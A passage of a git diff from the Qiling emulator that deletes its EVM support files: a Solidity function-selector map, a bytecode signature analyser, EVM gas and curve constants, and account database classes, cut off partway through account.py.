"0x0dd2d96c", "buyTokensCrowdsale(address)": "0xc5981892", "createTeamTokenByPercentage()": "0x7470f760", "addTeamAddress(address,uint256,uint256)": "0xa22913b5", "setPresaleWhitelist(address,bool)": "0x70037a71", "Crowdsale(address,address,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,bool)": "0xcbf2b203", "addTeamAddressInternal(address,uint256,uint256)": "0x99538898", "calculateTokenCrowsale(uint256,uint256)": "0x71616b84", "calculateTokenPresale(uint256,uint256)": "0x8931c998", "CrowdsaleLimit(uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256,uint256)": "0xbbb7259c", "PiplToken()": "0x47355ba5", "updatePartnerMap(address,uint256,uint256,uint256)": "0x2c8595bc", "validateAuthentication(address,uint256,uint256)": "0x0e97e3d3", "updateHydroMap(address,uint256,uint256)": "0x4c1f85ae", "checkForValidChallenge(address,uint256)": "0xc3ff3878", "whitelistAddress(address,bool,uint256)": "0xaf017526", "LINKFund()": "0xd3e2846a", "mintForInvestor(address,uint256,uint256)": "0xc89231b3", "_weekFor(uint256)": "0xcc21a9a2", "_getPeriodFor(uint256)": "0x8817ecde", "_balanceOf(address)": "0xcca3e832", "setDAOContract(address)": "0x425d512a", "setSummary(string)": "0x89514f6e", "getEmail()": "0x7e79e8ba", "CVAlejandro()": "0xc0b8a80d", "elementsAreSet()": "0x7e9aef53", "getAuthor()": "0xa5faa125", "takeSell(address,uint256,uint256,address)": "0x2d685f15", "totalSellPrice(uint256,uint256)": "0xc01a1c5f", "takeBuy(address,uint256,uint256,address)": "0xe78c219b", "totalBuyPrice(uint256,uint256)": "0x3d8d0db4", "cancelBuyOrder(address,uint256)": "0x70e9ff60", "cancelSellOrder(address,uint256)": "0x2993ed2d", "buyOrder(address,uint256,uint256)": "0x79583e22", "sellOrder(address,uint256,uint256)": "0x24ce9d27", "changeSellFee(uint256)": "0x6466cfa1", "changeBuyFee(uint256)": "0xe0655fe5", "Ethex(address,address,uint256,uint256)": "0x209bb163", "ETH_FUND(address)": "0xbe913b6f", "Game(address)": "0xcf2b16d9", "SerbiavsBrazil()": "0x8ce795f5", "CleariumToken()": "0x049766a8", "sendTokensToMe(address,uint256)": "0xbaac4316", "sendToMe()": "0xa501ab39", "Bounty()": "0xaa53d504", "getContractReceiver(address)": "0x70aecf61", "getContributionsCount(address)": "0xcaf9bf58", "proposeTx(address,uint256)": "0x3ce39a3d", "RapidChain()": "0x090a1f92", "LasVegas()": "0x1e8d15f8", "EOSGold(uint256,uint256)": "0x9dace789", "TokenBlockPay()": "0x3a1053a1", "kkTestICO91()": "0xf79915ce", "Simscoin()": "0xab7df819", "changeTokenWallet(address)": "0x75821d21", "_getVolumeBonus(uint256,uint256)": "0x94c4e3c6", "Fiocoin()": "0xefc4cbdd", "DURIANX()": "0x5fcba9ae", "FABIToken()": "0x8d3972d5", "StuckOnStupidToken()": "0x73454fe4", "LATIME()": "0xca4223ad", "UnicronToken()": "0x6b97e5eb", "CAD_Omnidollar()": "0x592d4c7e", "sendETH(bytes32,bytes32)": "0x39e4dc18", "AirRopToken()": "0x9349ba44", "Panthercoin()": "0xfc17ce26", "CaptainKitties()": "0xa346b62d", "Apex()": "0x96b90b05", "finalizeContruibute()": "0x41179685", "isContruibuteOpen()": "0x0a08de75", "contruibuteData(bytes)": "0xfdcb7539", "amountOf(address)": "0x01608f5f", "changeSettings(uint256,uint256,uint256,uint256,uint256)": "0x16948e9b", "startContruibute()": "0x2716baa6", "setupToken(address)": "0xb3c4a36b", "YggdrashCrowd(address,address,address,uint256,uint256,uint256,uint256)": "0x03d699da", "allocateTokens(uint256,address)": "0x9922ea86", "hodlerTransfer(address,uint256)": "0xa0bd1ec1", "Purpose()": "0xd922f603", "getAskByUserID(uint32)": "0xa0376dfe", "getAsksCount()": "0x54290065", "buy_energy_core(address,uint32,uint32,uint64,uint32,uint64)": "0xf7770906", "buy_energy(address,uint32,uint32,uint64)": "0xa77674a7", "buy_energy(address,uint32,uint32,uint64,uint32,uint64)": "0x6dd8d3bf", "getBidByProducerAndDay(address,uint32)": "0x27c16605", "getBidsCount()": "0x63505ae8", "offer_energy(uint32,uint32,uint64,uint64)": "0x520e7b0e", "deregisterProducer(address)": "0x9ed81bc9", "registerProducer(address)": "0x3c530ace", "registerConsumer(address,uint32)": "0xccf5c5cf", "TotlePrimary(address)": "0x7045b469", "CcifToken()": "0x92ed888b", "withdrawDepositorFunds(address,uint256)": "0xd2e73d78", "returnDeposit()": "0x7e88f603", "addDeposit()": "0x4a58db19", "initBank(uint256)": "0x57207703", "setOwnerThree(address)": "0x7fd84609", "setOwnerTwo(address)": "0x54ab5561", "setOwnerOne(address)": "0x81d97051", "isCreator()": "0xee92d484", "MiamiToken()": "0xd3c62676", "TheGTokenTest(uint256,string,uint8,string)": "0x89d700a5", "placeBid(string)": "0xe967e60c", "XCloudRoc()": "0x0eb5a167", "EOUNCE()": "0x70d0c5d8", "RefundableAllocatedCappedCrowdsale(uint256,address,address,uint256,uint256,uint256,uint256,address,address,address,address,uint256)": "0xec109249", "FundsVault(address)": "0xb34253be", "isHardCapGoalReached()": "0xcd497999", "isSoftCapGoalReached()": "0x0fc3866f", "setHardCapInCents(uint256)": "0x5ac44089", "setSoftCapInCents(uint256)": "0x23e9637f", "setSecondStageEndsAt(uint256)": "0x6e730a67", "setSecondStageStartsAt(uint256)": "0xc1e4884d", "setFirstStageEndsAt(uint256)": "0xad88f53e", "setFirstStageStartsAt(uint256)": "0xd131dfb8", "finalizeSecondStage()": "0xaa7622c7", "finalizeFirstStage()": "0x90714770", "externalBuy(address,uint256,uint256)": "0x855460d8", "issueTeamTokens()": "0xe7ec8182", "preallocateSecondStage(address,uint256,uint256)": "0x3c33808d", "preallocateFirstStage(address,uint256,uint256)": "0x100ed0fc", "changeCurrentEtherRateInCents(uint256)": "0x9240551b", "AMBASSADOR_ONE()": "0xe6d8d435", "closeCampaign()": "0xd7557f18", "maximumValueDuringGuaranteedPeriod()": "0xb637b269", "ownerstake()": "0xe979fed6", "purchased()": "0x879f9c96", "presaleFundingTargetInEther()": "0x407532bb", "InitialOwnerAddress()": "0x9b865999", "TOKEN_TREASURY()": "0x630dd52f", "approvedUser()": "0xb9dc25c5", "walletBountyAndAdvisors()": "0x3e9744da", "getWinnings()": "0x70b7596b", "buildings_total()": "0x27d21602", "crowdfundingTarget()": "0x393a1955", "MINING_RESERVE()": "0xf26f336e", "MAT_CROWDSALE_SUPPLY_LIMIT()": "0x9d1eb451", "currentMintableTokens()": "0x9ae6309a", "phaseOneBonusPercent()": "0x875de431", "openLedgerAddress()": "0xb7eea206", "SOFTCAP_LIMIT()": "0x28a852db", "teamAllowance()": "0xb02dbd07", "unVote()": "0x2c70d64e", "Founder()": "0x3278dc67", "vestingPaid()": "0x81cebf7e", "withdrawTokenShare()": "0xcc863948", "SELL_SOFT_LIMIT()": "0x7f84017f", "TRANSFERS_PER_TRANSACTION()": "0x58fa812b", "addressTeam()": "0x562e9df9", "amountRaisedPhase()": "0xfab4969f", "etherRate()": "0xd0f7a601", "tokensForTournament()": "0x6b5de05a", "getCapInWei()": "0x0eafb6da", "currentNonce()": "0xadb610a3", "frozenDaysForBounty()": "0x244eba55", "RoundTime()": "0xacfb153d", "tokensForBonus()": "0x6bcc311c", "stopPreIcoAndBurn()": "0x6ac54d62", "tokenSaleOngoing()": "0xd4430bc7", "tokenSalePausedTime()": "0x8ccdcf80", "destructionContractAddress()": "0x73e2faa8", "IsPreSaleEnabled()": "0xb51ad456", "bonusPersent()": "0x72b8a5cf", "nextForkUrl()": "0xe03992fd", "smallId()": "0x57386c2a", "_percentSoldInICO()": "0x1dead827", "powered_up()": "0x64c2b768", "PokerPayoutValue()": "0xe551bff0", "EIP20ByteCode()": "0x7cf62838", "ovcPerEther()": "0x6b3bc4b6", "ethTokenRate()": "0xe18099e1", "maxbet()": "0x37b4d863", "CEO_TEAM_SHARE()": "0xdffd9b8e", "PRICE_11()": "0xb2bc6c19", "stage3Start()": "0xf90e292c", "etherExchangeLikeCoin()": "0x66c9bc38", "numberDecimal18()": "0xc2dced85", "lockedAt()": "0xb2163482", "c_maximumTokensSold()": "0x991e86bb", "mintMarketingTokens()": "0x03c7da39", "helloWorld()": "0xc605f76c", "ROLE_ADMINISTRATOR()": "0xecdfdc27", "coinPriceInWei()": "0x2d247cc6", "eachIssuedAmount()": "0x41bb50f7", "DAOrewardAccount()": "0x82bf6464", "privateTime()": "0xc9ff34ec", "thanksAllGenesisUsers()": "0x45bddbb8", "BTCCollected()": "0x7f4fd78e", "partners()": "0x81add559", "minInvestmentInWei()": "0x2a39a069", "releaseManager()": "0x0d78573e", "minCapIco()": "0x7f76d76d", "YEAR_TWO_SUPPLY()": "0x4c88bc26", "UNSOLD_ALLOCATION_SIZE()": "0x3188ed13", "presale_allocation()": "0x13711a31", "sendDividendsEthers()": "0x7c72d868", "dateRelease3()": "0x3d080bd9", "breakDurationBetweenPresaleAndICO()": "0x17473975", "futureRoundTokensRelease()": "0xd52e4633", "HAYATO()": "0x3df95fc9", "NVTAddr()": "0xd367a398", "SALE_SUPPLY()": "0xcbf6fff9", "presaleWeiLimit()": "0x0d99edbf", "tokenSoldPreSale()": "0x553543c5", "areFundsReleasedToBudget()": "0x46b77d9f", "month30Unlock()": "0x6061d692", "tokensStillInLockup()": "0xafe17129", "totalDropPerUnlockedToken()": "0xed343f65", "getTokenSCADARequiresHardCap()": "0x0fe1f548", "preIcoTokens()": "0xd5778d37", "originalContract()": "0xe2c345e2", "TEAM_TOKENS2()": "0x1e9e541c", "ONE_DECIMAL_QUANTUM_ANZ_TOKEN_PRICE()": "0x95543693", "endprivate()": "0x1a8b1874", "bountySupply()": "0x86852fd7", "withdrawal_party_a_gets()": "0xd6d80f0b", "team_wallet()": "0x6ea79583", "maxLeaders()": "0xa35cad77", "reservedPercentTotal()": "0x6bce6569", "OMG()": "0xd48e9cd5", "bonusSale()": "0x0c14080b", "getMaxTradeAmount()": "0x09aea85f"} \ No newline at end of file diff --git a/qiling/arch/evm/analysis/signatures.py b/qiling/arch/evm/analysis/signatures.py deleted file mode 100644 index e7eed5092..000000000 --- a/qiling/arch/evm/analysis/signatures.py +++ /dev/null @@ -1,108 +0,0 @@ -import inspect -from pathlib import Path -import re -import logging -import json - - -class solidity_function: - def __init__(self, xref, start_insn, sign, name, prefered_name) -> None: - self.xref = xref - self.start_insn = start_insn - self.end_insn = None - self.code = None - - self.sign = sign - self.name = name - self.prefered_name = prefered_name - - self.argu_count = 0 - self.most_prefered_name = [] - - def analysis_args(self): - for i in self.code: - if isinstance(i, dict): - if i['opcode'] == 'CALLDATALOAD': - self.argu_count += 1 - else: - if i.mnemonic == 'CALLDATALOAD': - self.argu_count += 1 - - for i in self.prefered_name: - args = re.findall(r'[(](.*?)[)]', i) - args_count = 0 if args[0] == '' else len(args[0].split(',')) - if args_count == self.argu_count: - self.most_prefered_name.append(i) - - -def analysis_func_sign(insns:list, engine_num=1): - insns = list(insns.values()) - funcs = [] - - for insn in insns: - try: - # PUSH4 are used to push the function signature on the stack - if insn.mnemonic == 'PUSH4': - index = insns.index(insn) - list_inst = insns[index:index + 4] - push4, eq, push, jumpi = list_inst[0], list_inst[1], list_inst[2], list_inst[3] - - # check if this basicblock test function signature - if eq.mnemonic == 'EQ' and push.mnemonic in ['PUSH1', 'PUSH2'] and jumpi.mnemonic == 'JUMPI': - xref = int(push.imm_op[2:] ,16) - sign = '0x' + push4.imm_op[2:].rjust(8, '0') - name = 'func_' + sign - if engine_num == 1: - prefered_name = signatures_engine_1.find_signature(sign) - else: - raise IndexError - - # find instr with offset == xref - func_start_insn = next(filter(lambda i: i.pc == xref, insns)) - - # create new function - func = solidity_function(xref, func_start_insn, sign, name, prefered_name) - funcs.append(func) - - if insn.mnemonic in ['RETURN', 'STOP']: - break - - except ValueError: - continue - except IndexError: - logging.warning('analysis_func_sign engine number Exception') - pass - except: - logging.warning('analysis_func_sign Failed') - pass - - for i in funcs: - start_index = insns.index(i.start_insn) - - for insn in insns[start_index:]: - if insn.mnemonic in ['RETURN', 'STOP', 'JUMP']: - insn.end_insn = insn - end_index = insns.index(insn.end_insn) - i.code = insns[start_index:end_index+1] - i.analysis_args() - break - - return funcs - -### -class signatures_engine_1: - @staticmethod - def find_signature(sign): - path = Path(inspect.getfile(inspect.getframe())).parent / 'signatures.json' - with path.open('r') as data_file: - data = json.load(data_file) - - list_name = [name for name, hexa in data.items() if hexa == sign] - - if len(list_name) > 1: - logging.warning('function signatures collision: %s', list_name) - return '_or_'.join(list_name) - elif list_name: - return list_name[0] - else: - return None diff --git a/qiling/arch/evm/constants.py b/qiling/arch/evm/constants.py deleted file mode 100644 index 4987ab535..000000000 --- a/qiling/arch/evm/constants.py +++ /dev/null @@ -1,191 +0,0 @@ -from eth_typing import ( - Address, - BlockNumber, - Hash32 -) - - -FRONTIER_FORK = 0x0 -HOMESTEAD_FORK = 0x1 -TANGERINE_WHISTLE_FORK = 0x3 -SPURIOUS_DRAGON_FORK = 0x4 -BYZANTIUM_FORK = 0x5 -CONSTANTINOPLE_FORK = 0x6 -PETERSBURG_FORK = 0x7 -ISTANBUL_FORK = 0x8 -MUIR_GLACIER_OFORK = 0x9 -BERLIN_FORK = 0x10 - - -ANY = 'any' -UINT256 = 'uint256' -BYTES = 'bytes' - -UINT_256_MAX = 2**256 - 1 -UINT_256_CEILING = 2**256 -UINT_255_MAX = 2**255 - 1 -UINT_255_CEILING = 2**255 -UINT_255_NEGATIVE_ONE = -1 + UINT_256_CEILING -UINT_64_MAX = 2**64 - 1 -NULL_BYTE = b'\x00' -EMPTY_WORD = NULL_BYTE * 32 - -UINT_160_CEILING = 2**160 - -CREATE_CONTRACT_ADDRESS = Address(b'') -ZERO_ADDRESS = Address(20 * b'\x00') -ZERO_HASH32 = Hash32(32 * b'\x00') - - -# -# Stack Limit -# -STACK_DEPTH_LIMIT = 1024 - - -# -# Gas Costs and Refunds -# -GAS_NULL = 0 -GAS_ZERO = 0 -GAS_BASE = 2 -GAS_VERYLOW = 3 -GAS_LOW = 5 -GAS_MID = 8 -GAS_HIGH = 10 -GAS_EXTCODE = 20 -GAS_BALANCE = 20 -GAS_SLOAD = 50 -GAS_JUMPDEST = 1 -GAS_SSET = 20000 -GAS_SRESET = 5000 - -REFUND_SCLEAR = 15000 - -GAS_SELFDESTRUCT = 0 -GAS_SELFDESTRUCT_NEWACCOUNT = 25000 -GAS_CREATE = 32000 -GAS_CALL = 40 -GAS_CALLVALUE = 9000 -GAS_CALLSTIPEND = 2300 -GAS_NEWACCOUNT = 25000 -GAS_EXP = 10 -GAS_EXPBYTE = 10 -GAS_MEMORY = 3 -GAS_TXCREATE = 32000 -GAS_TXDATAZERO = 4 -GAS_TXDATANONZERO = 68 -GAS_TX = 21000 -GAS_LOG = 375 -GAS_LOGDATA = 8 -GAS_LOGTOPIC = 375 -GAS_SHA3 = 30 -GAS_SHA3WORD = 6 -GAS_COPY = 3 -GAS_BLOCKHASH = 20 -GAS_CODEDEPOSIT = 200 - -GAS_MEMORY_QUADRATIC_DENOMINATOR = 512 - - -# -# Pre-compile contract gas costs -# -GAS_SHA256 = 60 -GAS_SHA256WORD = 12 - -GAS_RIPEMD160 = 600 -GAS_RIPEMD160WORD = 120 - -GAS_IDENTITY = 15 -GAS_IDENTITYWORD = 3 - -GAS_ECRECOVER = 3000 - -GAS_ECADD = 500 -GAS_ECMUL = 40000 - -GAS_ECPAIRING_BASE = 100000 -GAS_ECPAIRING_PER_POINT = 80000 - - -# -# Gas Limit -# -GAS_LIMIT_EMA_DENOMINATOR = 1024 -GAS_LIMIT_ADJUSTMENT_FACTOR = 1024 -GAS_LIMIT_MINIMUM = 5000 -GAS_LIMIT_MAXIMUM = 2 ** 63 - 1 - -GAS_LIMIT_USAGE_ADJUSTMENT_NUMERATOR = 3 -GAS_LIMIT_USAGE_ADJUSTMENT_DENOMINATOR = 2 - - -# -# Difficulty -# -DIFFICULTY_ADJUSTMENT_DENOMINATOR = 2048 -DIFFICULTY_MINIMUM = 131072 - -BOMB_EXPONENTIAL_PERIOD = 100000 -BOMB_EXPONENTIAL_FREE_PERIODS = 2 - -# -# Mining -# -# BLOCK_REWARD = 5 * denoms.ether - -UNCLE_DEPTH_PENALTY_FACTOR = 8 -MAX_UNCLE_DEPTH = 6 -MAX_UNCLES = 2 - -# -# SECPK1N -# -SECPK1_P = 2**256 - 2**32 - 977 -SECPK1_N = 115792089237316195423570985008687907852837564279074904382605163141518161494337 -SECPK1_A = 0 -SECPK1_B = 7 -SECPK1_Gx = 55066263022277343669578718895168534326250603453777594175500187360389116729240 -SECPK1_Gy = 32670510020758816978083085130507043184471273380659243275938904335757337482424 -SECPK1_G = (SECPK1_Gx, SECPK1_Gy) - - -# -# Block and Header -# -# keccak(rlp.encode([])) -EMPTY_UNCLE_HASH = Hash32(b'\x1d\xccM\xe8\xde\xc7]z\xab\x85\xb5g\xb6\xcc\xd4\x1a\xd3\x12E\x1b\x94\x8at\x13\xf0\xa1B\xfd@\xd4\x93G') # noqa: E501 - - -# -# Genesis Data -# -GENESIS_BLOCK_NUMBER = BlockNumber(0) -GENESIS_DIFFICULTY = 17179869184 -GENESIS_GAS_LIMIT = 5000 -GENESIS_PARENT_HASH = ZERO_HASH32 -GENESIS_COINBASE = ZERO_ADDRESS -GENESIS_NONCE = b'\x00\x00\x00\x00\x00\x00\x00B' # 0x42 encoded as big-endian-integer -GENESIS_MIX_HASH = ZERO_HASH32 -GENESIS_EXTRA_DATA = b'' -# -# Sha3 Keccak -# -EMPTY_SHA3 = Hash32(b"\xc5\xd2F\x01\x86\xf7#<\x92~}\xb2\xdc\xc7\x03\xc0\xe5\x00\xb6S\xca\x82';\x7b\xfa\xd8\x04]\x85\xa4p") # noqa: E501 -BLANK_ROOT_HASH = Hash32(b'V\xe8\x1f\x17\x1b\xccU\xa6\xff\x83E\xe6\x92\xc0\xf8n\x5bH\xe0\x1b\x99l\xad\xc0\x01b/\xb5\xe3c\xb4!') # noqa: E501 - - -GAS_MOD_EXP_QUADRATIC_DENOMINATOR = 20 - -# -# BLOCKHASH opcode maximum depth -# -MAX_PREV_HEADER_DEPTH = 256 - -# -# Call overrides -# -DEFAULT_SPOOF_V = 37 -DEFAULT_SPOOF_R = 1 -DEFAULT_SPOOF_S = 1 diff --git a/qiling/arch/evm/db/__init__.py b/qiling/arch/evm/db/__init__.py deleted file mode 100644 index f56efed10..000000000 --- a/qiling/arch/evm/db/__init__.py +++ /dev/null @@ -1,28 +0,0 @@ -import os -from typing import ( - Any, - Type, - cast -) - -from eth_utils import import_string - -from ..abc import AtomicDatabaseAPI - - -DEFAULT_DB_BACKEND = 'eth.db.atomic.AtomicDB' - - -def get_db_backend_class(import_path: str = None) -> Type[AtomicDatabaseAPI]: - if import_path is None: - import_path = os.environ.get( - 'CHAIN_DB_BACKEND_CLASS', - DEFAULT_DB_BACKEND, - ) - return cast(Type[AtomicDatabaseAPI], import_string(import_path)) - - -def get_db_backend(import_path: str = None, **init_kwargs: Any) -> AtomicDatabaseAPI: - backend_class = get_db_backend_class(import_path) - # mypy doesn't understand the constructor of AtomicDatabaseAPI - return backend_class(**init_kwargs) # type: ignore diff --git a/qiling/arch/evm/db/accesslog.py b/qiling/arch/evm/db/accesslog.py deleted file mode 100644 index a1d123381..000000000 --- a/qiling/arch/evm/db/accesslog.py +++ /dev/null @@ -1,113 +0,0 @@ -from contextlib import contextmanager -import logging -from typing import ( - Iterator, - FrozenSet, - Set, -) - -from ..abc import ( - AtomicWriteBatchAPI, - AtomicDatabaseAPI, - DatabaseAPI, -) -from ..db.backends.base import ( - BaseDB, -) -from ..db.atomic import ( - BaseAtomicDB, -) - - -class KeyAccessLoggerDB(BaseDB): - """ - Wraps around a database, and tracks all the keys that were read since initialization. - """ - - logger = logging.getLogger("eth.db.KeyAccessLoggerDB") - - def __init__(self, wrapped_db: DatabaseAPI, log_missing_keys: bool = True) -> None: - """ - :param log_missing_keys: True if a key is added to :attr:`keys_read` even if the - key/value does not exist in the database. - """ - self.wrapped_db = wrapped_db - self._keys_read: Set[bytes] = set() - self._log_missing_keys = log_missing_keys - - @property - def keys_read(self) -> FrozenSet[bytes]: - # Make a defensive copy so callers can't modify the list externally - return frozenset(self._keys_read) - - def __getitem__(self, key: bytes) -> bytes: - try: - result = self.wrapped_db.__getitem__(key) - except KeyError: - if self._log_missing_keys: - self._keys_read.add(key) - raise - else: - self._keys_read.add(key) - return result - - def __setitem__(self, key: bytes, value: bytes) -> None: - self.wrapped_db[key] = value - - def __delitem__(self, key: bytes) -> None: - del self.wrapped_db[key] - - def _exists(self, key: bytes) -> bool: - does_exist = key in self.wrapped_db - if does_exist or self._log_missing_keys: - self._keys_read.add(key) - return does_exist - - -class KeyAccessLoggerAtomicDB(BaseAtomicDB): - """ - Wraps around an atomic database, and tracks all the keys that were read since initialization. - """ - logger = logging.getLogger("eth.db.KeyAccessLoggerAtomicDB") - - def __init__(self, wrapped_db: AtomicDatabaseAPI, log_missing_keys: bool = True) -> None: - """ - :param log_missing_keys: True if a key is added to :attr:`keys_read` even if the - key/value does not exist in the database. - """ - self.wrapped_db = wrapped_db - self._keys_read: Set[bytes] = set() - self._log_missing_keys = log_missing_keys - - @property - def keys_read(self) -> FrozenSet[bytes]: - # Make a defensive copy so callers can't modify the list externally - return frozenset(self._keys_read) - - def __getitem__(self, key: bytes) -> bytes: - try: - result = self.wrapped_db.__getitem__(key) - except KeyError: - if self._log_missing_keys: - self._keys_read.add(key) - raise - else: - self._keys_read.add(key) - return result - - def __setitem__(self, key: bytes, value: bytes) -> None: - self.wrapped_db[key] = value - - def __delitem__(self, key: bytes) -> None: - del self.wrapped_db[key] - - def _exists(self, key: bytes) -> bool: - does_exist = key in self.wrapped_db - if does_exist or self._log_missing_keys: - self._keys_read.add(key) - return does_exist - - @contextmanager - def atomic_batch(self) -> Iterator[AtomicWriteBatchAPI]: - with self.wrapped_db.atomic_batch() as readable_batch: - yield readable_batch diff --git a/qiling/arch/evm/db/account.py b/qiling/arch/evm/db/account.py deleted file mode 100644 index 7c8ac3a62..000000000 --- a/qiling/arch/evm/db/account.py +++ /dev/null @@ -1,540 +0,0 @@ -from lru import LRU -from typing import ( - cast, - Dict, - Iterable, - Set, - Tuple, -) - -from eth_hash.auto import keccak -from eth_typing import ( - Address, - Hash32 -) - -from eth_utils import ( - encode_hex, - get_extended_debug_logger, - to_checksum_address, - to_dict, - to_tuple, - ValidationError, -) -import rlp -from trie import ( - HexaryTrie, - exceptions as trie_exceptions, -) - -from ..abc import ( - AccountDatabaseAPI, - AccountStorageDatabaseAPI, - AtomicDatabaseAPI, - DatabaseAPI, - MetaWitnessAPI, -) -from ..constants import ( - BLANK_ROOT_HASH, - EMPTY_SHA3, -) -from ..db.accesslog import ( - KeyAccessLoggerAtomicDB, - KeyAccessLoggerDB, -) -from ..db.batch import ( - BatchDB, -) -from ..db.cache import ( - CacheDB, -) -from ..db.diff import ( - DBDiff, -) -from ..db.journal import ( - JournalDB, -) -from ..db.storage import ( - AccountStorageDB, -) -from ..db.witness import ( - AccountQueryTracker, - MetaWitness, -) -from ..typing import ( - JournalDBCheckpoint, -) -from ..vm.interrupt import ( - MissingAccountTrieNode, - MissingBytecode, -) -from ..rlp.accounts import ( - Account, -) -from ..validation import ( - validate_is_bytes, - validate_uint256, - validate_canonical_address, -) - -from .hash_trie import HashTrie - - -class AccountDB(AccountDatabaseAPI): - logger = get_extended_debug_logger('eth.db.account.AccountDB') - - def __init__(self, db: AtomicDatabaseAPI, state_root: Hash32 = BLANK_ROOT_HASH) -> None: - r""" - Internal implementation details (subject to rapid change): - Database entries go through several pipes, like so... - - .. code:: - - db > _batchdb ---------------------------> _journaldb ----------------> code lookups - \ - -> _batchtrie -> _trie -> _trie_cache -> _journaltrie --------------> account lookups - - Journaling sequesters writes at the _journal* attrs ^, until persist is called. - - _batchtrie enables us to prune all trie changes while building - state, without deleting old trie roots. - - _batchdb and _batchtrie together enable us to make the state root, - without saving everything to the database. - - _journaldb is a journaling of the keys and values used to store - code and account storage. - - _trie is a hash-trie, used to generate the state root - - _trie_cache is a cache tied to the state root of the trie. It - is important that this cache is checked *after* looking for - the key in _journaltrie, because the cache is only invalidated - after a state root change. - - _journaltrie is a journaling of the accounts (an address->rlp mapping, - rather than the nodes stored by the trie). This enables - a squashing of all account changes before pushing them into the trie. - - .. NOTE:: StorageDB works similarly - - AccountDB synchronizes the snapshot/revert/persist of both of the - journals. - """ - self._raw_store_db = KeyAccessLoggerAtomicDB(db, log_missing_keys=False) - self._batchdb = BatchDB(self._raw_store_db) - self._batchtrie = BatchDB(self._raw_store_db, read_through_deletes=True) - self._journaldb = JournalDB(self._batchdb) - self._trie = HashTrie(HexaryTrie(self._batchtrie, state_root, prune=True)) - self._trie_logger = KeyAccessLoggerDB(self._trie, log_missing_keys=False) - self._trie_cache = CacheDB(self._trie_logger) - self._journaltrie = JournalDB(self._trie_cache) - self._account_cache = LRU(2048) - self._account_stores: Dict[Address, AccountStorageDatabaseAPI] = {} - self._dirty_accounts: Set[Address] = set() - self._root_hash_at_last_persist = state_root - self._accessed_accounts: Set[Address] = set() - self._accessed_bytecodes: Set[Address] = set() - - @property - def state_root(self) -> Hash32: - return self._trie.root_hash - - @state_root.setter - def state_root(self, value: Hash32) -> None: - if self._trie.root_hash != value: - self._trie_cache.reset_cache() - self._trie.root_hash = value - - def has_root(self, state_root: bytes) -> bool: - return state_root in self._batchtrie - - # - # Storage - # - def get_storage(self, address: Address, slot: int, from_journal: bool = True) -> int: - validate_canonical_address(address, title="Storage Address") - validate_uint256(slot, title="Storage Slot") - - account_store = self._get_address_store(address) - return account_store.get(slot, from_journal) - - def set_storage(self, address: Address, slot: int, value: int) -> None: - validate_uint256(value, title="Storage Value") - validate_uint256(slot, title="Storage Slot") - validate_canonical_address(address, title="Storage Address") - - account_store = self._get_address_store(address) - self._dirty_accounts.add(address) - account_store.set(slot, value) - - def delete_storage(self, address: Address) -> None: - validate_canonical_address(address, title="Storage Address") - - self._set_storage_root(address, BLANK_ROOT_HASH) - self._wipe_storage(address) - - def _wipe_storage(self, address: Address) -> None: - """ - Wipe out the storage, without explicitly handling the storage root update - """ - account_store = self._get_address_store(address) - self._dirty_accounts.add(address) - account_store.delete() - - def _get_address_store(self, address: Address) -> AccountStorageDatabaseAPI: - if address in self._account_stores: - store = self._account_stores[address] - else: - storage_root = self._get_storage_root(address) - store = AccountStorageDB(self._raw_store_db, storage_root, address) - self._account_stores[address] = store - return store - - def _dirty_account_stores(self) -> Iterable[Tuple[Address, AccountStorageDatabaseAPI]]: - for address in self._dirty_accounts: - store = self._account_stores[address] - yield address, store - - @to_tuple - def _get_changed_roots(self) -> Iterable[Tuple[Address, Hash32]]: - # list all the accounts that were changed, and their new storage roots - for address, store in self._dirty_account_stores(): - if store.has_changed_root: - yield address, store.get_changed_root() - - def _get_storage_root(self, address: Address) -> Hash32: - account = self._get_account(address) - return account.storage_root - - def _set_storage_root(self, address: Address, new_storage_root: Hash32) -> None: - account = self._get_account(address) - self._set_account(address, account.copy(storage_root=new_storage_root)) - - def _validate_flushed_storage(self, address: Address, store: AccountStorageDatabaseAPI) -> None: - if store.has_changed_root: - actual_storage_root = self._get_storage_root(address) - expected_storage_root = store.get_changed_root() - if expected_storage_root != actual_storage_root: - raise ValidationError( - "Storage root was not saved to account before trying to persist roots. " - f"Account {address!r} had storage {actual_storage_root!r}, " - f"but should be {expected_storage_root!r}." - ) - - # - # Balance - # - def get_balance(self, address: Address) -> int: - validate_canonical_address(address, title="Storage Address") - - account = self._get_account(address) - return account.balance - - def set_balance(self, address: Address, balance: int) -> None: - validate_canonical_address(address, title="Storage Address") - validate_uint256(balance, title="Account Balance") - - account = self._get_account(address) - self._set_account(address, account.copy(balance=balance)) - - # - # Nonce - # - def get_nonce(self, address: Address) -> int: - validate_canonical_address(address, title="Storage Address") - - account = self._get_account(address) - return account.nonce - - def set_nonce(self, address: Address, nonce: int) -> None: - validate_canonical_address(address, title="Storage Address") - validate_uint256(nonce, title="Nonce") - - account = self._get_account(address) - self._set_account(address, account.copy(nonce=nonce)) - - def increment_nonce(self, address: Address) -> None: - current_nonce = self.get_nonce(address) - self.set_nonce(address, current_nonce + 1) - - # - # Code - # - def get_code(self, address: Address) -> bytes: - validate_canonical_address(address, title="Storage Address") - - code_hash = self.get_code_hash(address) - if code_hash == EMPTY_SHA3: - return b'' - else: - try: - return self._journaldb[code_hash] - except KeyError: - raise MissingBytecode(code_hash) #from KeyError - finally: - if code_hash in self._get_accessed_node_hashes(): - self._accessed_bytecodes.add(address) - - def set_code(self, address: Address, code: bytes) -> None: - validate_canonical_address(address, title="Storage Address") - validate_is_bytes(code, title="Code") - - account = self._get_account(address) - - code_hash = keccak(code) - self._journaldb[code_hash] = code - self._set_account(address, account.copy(code_hash=code_hash)) - - def get_code_hash(self, address: Address) -> Hash32: - validate_canonical_address(address, title="Storage Address") - - account = self._get_account(address) - return account.code_hash - - def delete_code(self, address: Address) -> None: - validate_canonical_address(address, title="Storage Address") - - account = self._get_account(address) - self._set_account(address, account.copy(code_hash=EMPTY_SHA3)) - - # - # Account Methods - # - def account_has_code_or_nonce(self, address: Address) -> bool: - return self.get_nonce(address) != 0 or self.get_code_hash(address) != EMPTY_SHA3 - - def delete_account(self, address: Address) -> None: - validate_canonical_address(address, title="Storage Address") - - # We must wipe the storage first, because if it's the first time we load it, - # then we want to load it with the original storage root hash, not the - # empty one. (in case of a later revert, we don't want to poison the storage cache) - self._wipe_storage(address) - - if address in self._account_cache: - del 